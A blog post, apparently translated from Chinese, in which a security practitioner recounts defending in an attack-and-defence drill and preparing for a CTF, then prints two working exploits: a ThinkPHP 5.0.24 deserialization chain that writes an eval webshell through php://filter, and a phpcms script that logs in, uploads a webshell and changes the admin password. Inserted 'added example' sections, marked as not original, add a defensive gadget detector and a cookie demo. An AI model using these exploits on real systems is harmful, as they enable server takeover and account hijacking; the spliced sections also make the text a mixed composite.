
Ramblings Since Joining

It has been nearly four months since I last posted. Work has genuinely been busy, and on the client (甲方) side technical skills grow a little more slowly. My four months on the job fall into two phases: from August to November I was busy with HW (the 护网 attack-and-defence drill), and from November until now with CTF.

Phase one

I joined in August and, after a week of onboarding, went straight into HW. It is a little absurd: last year I was on an attack team doing penetration testing, and this year I am on the defending side. The unit had been gearing up for HW since March, deploying security appliances and redeploying parts of the architecture; I am embarrassed I did not come to intern earlier.

On the work I did for the formal HW: the leadership knew I came from an attack team, so my first task was a penetration test of the weaker network segments. With a few of the vendor's guys I did find quite a few vulnerabilities (I won't go into specifics). We got onto one server whose NIC appeared to connect to the production network, and I was thrilled at the time, but unfortunately it only had an IP configured and no route. I produced a pentest report, and getting shell on a fair number of hosts was enough to report back to the leadership.

When the formal HW started I did not know the unit's network architecture or how the security appliances were deployed, and the vendor's people and my colleagues walked me through it. By coincidence my former employer was drawn to attack us in the lottery, so I quickly sounded out former colleagues about whether they were bringing 0days; by an even bigger coincidence, another colleague who had left to lead a team at xx sent his juniors over to help us. During the formal HW my main duties were incident response, attribution (溯源) and watching the monitoring appliances, and I also wrote a handbook on hunting and killing in-memory webshells (記憶體馬). Mostly, though, the period was about getting to know the unit's business architecture. I have to admire the penetration report unit xxx produced during the small HW; I genuinely learned from it. Everyone has all the penetration techniques and knowledge points; the hardest part of penetration is chaining them together in a short time to go straight for the jugular. There were also attribution reports well worth studying, and the final result was very respectable.

Most worth mentioning: through the work I met a lot of seriously good people at the vendors (I won't give IDs), and also got to know a friend from BUPT who does Java web. We got along very well; our research directions and ideas are basically identical. Later I referred him to many of the big labs, basically retracing the path I took last year, and in the end he got into a unit he had dreamed of. It is impressive that at barely twenty-something he is already that capable; his future is unbounded.

Phase two

After HW ended I was busy with wrap-up work, writing all kinds of reports and summaries; the results were just announced, and it is one more line for the résumé. Then my team lead handed the penetration testing work to me. At first I did it hands-on myself; once the on-site contractors arrived I delegated it. To be honest (u1s1), black-box testing of these systems does only so much for your skills; I only step in personally on systems that are hard to crack.

Another impression from the job: some practitioners do security with their heart, others just coast. I had planned to mentor one on-site contractor for a year so his skills would take a qualitative leap, but found that he really was just coasting; fine, I do not expect much from some people and stopped engaging with him much. Another on-site contractor is sharp and receptive, and I plan to have him help get CodeQL adopted at the unit, building a home-grown code-audit tool to dig out simple vulnerabilities.

Then came preparation for the CTF organised by the unit. A colleague wrote a framework for planting backdoors, an AWD on-site framework, a WAF and a file-monitoring program, plus an internal-network penetration checklist and an AWD checklist; we are not open-sourcing these tools for now, maybe later. This year's on-site competition was clearly different from before: it tested basic code-audit ability rather than the old hand-speed race, and the challenges were fairly basic. The one interesting challenge was the DSMall system: exploiting the ThinkPHP 5.0.24 POP-chain deserialization to write a shell. For the detailed analysis see the links at the bottom; on Linux it bypasses the "death exit" (the exit() header the File cache driver prepends to cached data), and the PoC is pasted below. The huge gotcha is that on macOS this PoC cannot write the shell.


Now for my work plans going forward:
1. Finish the books on hand (the Anheng red book, the 0day attack-and-defence book).
2. Pick pwn back up and read the new books as they come out.
3. Get CodeQL adopted and write a home-grown code-audit scanner.
4. Security operations and SDL work at the unit.

<?php
namespace think\process\pipes;
use think\model\Pivot;
class Pipes{

}

class Windows extends Pipes{
    private $files = [];

    function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;#Relation
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query = new Query();#class Query
    }
}

namespace think\model\relation;#OneToOne HasOne
use think\model\Relation;
abstract class OneToOne extends Relation{
    function __construct(){
        parent::__construct();
    }

}
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}

namespace think\console;#Output
use think\session\driver\Memcached;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct(){
        $this->handle = new Memcached();//goal: reach its write()
        $this->styles = ['getAttr'];
    }
}

namespace think;#Model
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;#changed here (visibility)
    protected $selfRelation;
    protected $query;
    protected $aaaaa;

    function __construct(){
        $this->parent = new Output();#Output object, so that __call() is reached
        $this->append = ['getError'];
        $this->error = new HasOne();//Relation subclass that has getBindAttr()
        $this->selfRelation = false;//isSelfRelation()
        $this->query = new Query();

    }
}

namespace think\db;#Query
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output();
    }
}

namespace think\session\driver;#Memcached
use think\cache\driver\File;
class Memcached{
    protected $handler = null;
    function __construct(){
        $this->handler = new File();//goal: reach File->set()
    }
}
namespace think\cache\driver;#File
class File{
    protected $options = [];
    protected $tag;
    function __construct(){
        $this->options = [
        'expire'        => 0,
        'cache_subdir'  => false,
        'prefix'        => '',
        'path'          => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
        'data_compress' => false,
        ];
        $this->tag = true;
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{


}
use think\process\pipes\Windows;


$obj=new Windows();
$res= ds_encrypt(base64_encode(serialize($obj)));
// $res = base64_encode(serialize($obj));
echo $res;
function ds_encrypt($txt, $key = '')
{
    define('TIMESTAMP',time());
    if (empty($txt))
        return $txt;
    if (empty($key))
        $key = md5('a2382918dbb49c8643f19bc3ab90ecf9');
    $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.";
    $ikey = "-x6g6ZWm2G9g_vr0Bo.pOq3kRIxsZ6rm";
    $nh1 = rand(0, 64);
    $nh2 = rand(0, 64);
    $nh3 = rand(0, 64);
    $ch1 = $chars[$nh1]; // curly-brace string offsets were removed in PHP 8
    $ch2 = $chars[$nh2];
    $ch3 = $chars[$nh3];
    $nhnum = $nh1 + $nh2 + $nh3;
    $knum = 0;
    $i = 0;
    while (isset($key[$i]))
        $knum += ord($key[$i++]);
    $mdKey = substr(md5(md5(md5($key . $ch1) . $ch2 . $ikey) . $ch3), $nhnum % 8, $knum % 8 + 16);
    $txt = base64_encode(TIMESTAMP . '_' . $txt);
    $txt = str_replace(array('+', '/', '='), array('-', '_', '.'), $txt);
    $tmp = '';
    $j = 0;
    $k = 0;
    $tlen = strlen($txt);
    $klen = strlen($mdKey);
    for ($i = 0; $i < $tlen; $i++) {
        $k = $k == $klen ? 0 : $k;
        $j = ($nhnum + strpos($chars, $txt[$i]) + ord($mdKey[$k++])) % 64;
        $tmp .= $chars[$j];
    }
    $tmplen = strlen($tmp);
    $tmp = substr_replace($tmp, $ch3, $nh2 % ++$tmplen, 0);
    $tmp = substr_replace($tmp, $ch2, $nh1 % ++$tmplen, 0);
    $tmp = substr_replace($tmp, $ch1, $knum % ++$tmplen, 0);
    return $tmp;
}
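Added example, not part of the original post or of DSMall/ThinkPHP: a defender-side pre-check in Python that flags the gadget classes and the php://filter wrapper used by the chain above in a serialized value, before the application hands it to unserialize(). The sample values are constructed, and the gadget list is taken from the class names in the PoC.

```python
import base64
import binascii
import re

# Gadget classes that make up the ThinkPHP 5.0.24 chain above; no legitimate DSMall
# cookie or cache value should carry serialized objects of these types.
GADGET_CLASSES = frozenset({
    "think\\process\\pipes\\Windows", "think\\model\\Pivot",
    "think\\model\\relation\\HasOne", "think\\console\\Output", "think\\db\\Query",
    "think\\session\\driver\\Memcached", "think\\cache\\driver\\File",
})
OBJECT_RE = re.compile(r'O:(\d+):"([^"]+)"')             # serialized object header O:<len>:"<class>"
WRAPPER_RE = re.compile(r"php://filter/", re.IGNORECASE)  # wrapper the chain's File options use


def maybe_base64(blob: str) -> str:
    """Undo the base64 layer the PoC applies; return blob unchanged if it is not clean base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return blob


def inspect_payload(blob: str) -> dict:
    """Report gadget classes, php://filter use and malformed object headers in a value."""
    data = maybe_base64(blob)
    gadgets, malformed = [], []
    for length, name in OBJECT_RE.findall(data):
        if int(length) != len(name):   # declared length must match; hand-edited blobs often do not
            malformed.append(name)
        if name in GADGET_CLASSES:
            gadgets.append(name)
    has_filter = bool(WRAPPER_RE.search(data))
    return {"gadgets": gadgets, "malformed": malformed, "php_filter": has_filter,
            "suspicious": bool(gadgets or malformed or has_filter)}


# Constructed samples (not captured traffic): a harmless array, the head of a chain like
# the one the PoC builds, its base64 form, and a File-driver option carrying the wrapper.
SAMPLE_BENIGN = 'a:2:{s:4:"user";s:5:"alice";s:4:"role";s:5:"guest";}'
SAMPLE_CHAIN = ('O:27:"think\\process\\pipes\\Windows":1:{s:34:"\x00think\\process\\pipes\\Windows'
                '\x00files";a:1:{i:0;O:17:"think\\model\\Pivot":0:{}}}')
SAMPLE_CHAIN_B64 = base64.b64encode(SAMPLE_CHAIN.encode("latin-1")).decode()
SAMPLE_FILTER = 's:4:"path";s:45:"php://filter/convert.base64-decode/resource=x";'

if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("chain", SAMPLE_CHAIN_B64),
                          ("filter", SAMPLE_FILTER)):
        print(label, inspect_payload(sample))
```

In DSMall's flow the value arrives ds_encrypt-ed, so a check like this belongs after decryption and before unserialize(); the more robust fix is `unserialize($s, ['allowed_classes' => false])` (or an explicit class list) so that no object is instantiated at all.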

Below is a phpcms post-authentication getshell PoC I wrote: feed it the captcha, the cookie and the IP and it runs. I really wrote it just to practise writing PoCs for authenticated functionality. `requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})` adds the cookie to every later request in the session, whereas the form below attaches the cookie to a single request only:

mycookie = { "PHPSESSID":"56v9clgo1kdfo3q5q8ck0aaaaa" }
x = requests.session()
x.get("http://127.0.0.1:80",cookies = mycookie)

For debugging:

print(dict(session.cookies))  # cookies before the request
print(dict(res1.cookies))     # cookies set by the response

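As an added example (not from the original post), the two cookie mechanisms just described, compared offline with `Session.prepare_request`, which builds the request headers exactly as `Session.get` would without sending anything; the hostname and session id are constructed.

```python
import requests

# Constructed session id and host, not real values.
COOKIE = {"PHPSESSID": "constructedsessionid0000"}
URL = "http://phpcms.example.test/phpcms_v9/index.php?m=admin&c=index&a=login"


def cookie_header(session: requests.Session, cookies=None):
    """Return the Cookie header requests would send for one GET, without sending it.

    prepare_request merges the session jar with any per-request cookies the same
    way Session.get does, so the resulting header can be inspected offline.
    """
    prepared = session.prepare_request(requests.Request("GET", URL, cookies=cookies))
    return prepared.headers.get("Cookie")


def per_request_cookie():
    """cookies= on a single call: sent with that call, never stored in the session jar."""
    session = requests.Session()
    first = cookie_header(session, cookies=COOKIE)   # header carries PHPSESSID
    second = cookie_header(session)                  # next call: nothing to send
    return first, second, dict(session.cookies)


def session_wide_cookie():
    """add_dict_to_cookiejar: stored in the jar, so every later call sends it."""
    session = requests.Session()
    requests.utils.add_dict_to_cookiejar(session.cookies, COOKIE)
    return cookie_header(session), cookie_header(session), dict(session.cookies)


if __name__ == "__main__":
    print("per-request :", per_request_cookie())
    print("session-wide:", session_wide_cookie())
```
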
#encoding: utf-8
# captcha image URL: http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login
import requests
import re
import random
def login(ip,code,cookie):
    session = requests.session()
    requests.utils.add_dict_to_cookiejar(session.cookies, {'PHPSESSID': cookie})
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=login&dosubmit=1"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&a=login&pc_hash=", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
    burp0_data = {"dosubmit": '', "username": "phpcms", "password": "phpcms", "code": code}
    res1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    print(re.findall('330px">(.+)</div>',res1.text)[0])
    # print(dict(session.cookies))
    # print(dict(res1.cookies))


    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=index&a=public_main"
    burp0_headers = {"Upgrade-Insecure-Requests": "1",
                     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=index&pc_hash",
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
                     "Connection": "close"}
    res2 = session.get(burp0_url, headers=burp0_headers)
    # print(dict(session.cookies))
    # print(dict(res2.cookies))
    pc_hash = re.findall('var pc_hash = \'(.+)\';',res2.text)[0]
    print('pc_hash: '+pc_hash)
    # print(res2.text)

#upload getshell
    modelname = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
    tablename = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))
    description = ''.join(random.sample('abcdefghigklmnopqrstuvwxyz',5))

    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=member&c=member_model&a=add"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.155.1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryXKC2cbu1uVQg3Tr3", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.155.1/phpcms_v9/index.php?m=member&c=member_model&a=add&pc_hash=gGF834", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
    burp0_data = "------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[modelname]\"\r\n\r\n"+modelname+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[tablename]\"\r\n\r\n"+tablename+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"info[description]\"\r\n\r\n"+description+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"model_import\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\narray(1);$b=file_put_contents(\".cache202012047548.php\",'<?php eval($_REQUEST[z]);?>');\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"dosubmit\"\r\n\r\n\xe6\x8f\x90\xe4\xba\xa4\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3\r\nContent-Disposition: form-data; name=\"pc_hash\"\r\n\r\n"+pc_hash+"\r\n------WebKitFormBoundaryXKC2cbu1uVQg3Tr3--\r\n"
    res3 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    print(res3.text)

    # change_pwd
    burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.199.181",
                     "Content-Type": "application/x-www-form-urlencoded",
                     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                     "Referer": "http://192.168.199.181//phpcms_v9/index.php?m=admin&c=admin_manage&a=public_edit_pwd&menuid=971&pc_hash="+pc_hash,
                     "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
                     "Connection": "close"}
    burp0_data = {"info[userid]": "1", "info[username]": "phpcms", "old_password": "phpcms", "new_password": "nongxinyin",
                  "new_pwdconfirm": "nongxinyin", "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash}
    res5 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    # print(res5.text)
    print(re.findall('max-width:330px">(.+)</div>',res5.text)[0])

#
#modify system.config getshell
    # burp0_url = "http://"+ip+"/phpcms_v9/index.php?m=admin&c=setting&a=save"
    # burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://172.28.161.163",
    #              "Content-Type": "application/x-www-form-urlencoded",
    #              "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
    #              "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    #              "Referer": "http://172.28.161.163/phpcms_v9/index.php?m=admin&c=setting&a=init&&tab=2&menuid=979&pc_hash="+pc_hash,
    #              "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
    #              "Connection": "close"}
    # burp0_data = {"setting[admin_email]": "[email protected]", "setting[category_ajax]": '', "setconfig[gzip]": "1",
    #           "setconfig[attachment_stat]": "1", "setconfig[js_path]": "http://172.28.161.163/phpcms_v9/statics/js/",
    #           "setconfig[css_path]": "http://172.28.161.163/phpcms_v9/statics/css/",
    #           "setconfig[img_path]": "http://172.28.161.163/phpcms_v9/statics/images/",
    #           "setconfig[upload_url]": "http://172.28.161.163/phpcms_v9/uploadfile/", "setconfig[admin_log]": "1",
    #           "setconfig[errorlog]": "1", "setting[errorlog_size]": "20", "setting[maxloginfailedtimes]": "8",
    #           "setting[minrefreshtime]": "2", "setconfig[admin_url]": '', "setconfig[phpsso]": "1",
    #           "setconfig[phpsso_appid]": "1",
    #           "setconfig[phpsso_api_url]": "http://172.28.161.163/phpcms_v9/phpsso_server",
    #           "setconfig[phpsso_auth_key]": "NHeSSQfQfxsXQCPcxs99EtYSDiGI6pey", "setconfig[phpsso_version]": "1",
    #           "setting[mail_type]": "1", "setting[mail_server]": "smtp.qq.com", "setting[mail_port]": "25",
    #           "setting[mail_from]": "[email protected]", "setting[mail_auth]": "1",
    #           "setting[mail_user]": "[email protected]", "setting[mail_password]": '', "mail_to": '',
    #           "setconfig[snda_akey]": "\\',@@eval($_POST[z]),//", "setconfig[snda_skey]": '',
    #           "setconfig[sina_akey]": '', "setconfig[sina_skey]": '', "setconfig[qq_akey]": '',
    #           "setconfig[qq_skey]": '', "setconfig[qq_appid]": '', "setconfig[qq_appkey]": '',
    #           "setconfig[qq_callback]": '', "dosubmit": "\xe6\x8f\x90\xe4\xba\xa4", "pc_hash": pc_hash }
    # res4 = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
    # # print(res4.text)
    # print(re.findall('-width:330px">(.+)</div>',res4.text)[0])




login('192.168.155.1','anwz','aic2c5br7fmmak60b28fu0h422')

https://www.anquanke.com/post/id/203461
https://xz.aliyun.com/t/7082
https://github.com/Ares-X/VulWiki/blob/a8a7d4d4d1530681e5b7f18daf7f471f7ff5c010/Web安全/Thinkphp/Thinkphp 反序列化漏洞/Thinkphp 5.0.24 反序列化漏洞.md
https://xz.aliyun.com/t/7457
https://blog.csdn.net/qq_45691294/article/details/109279879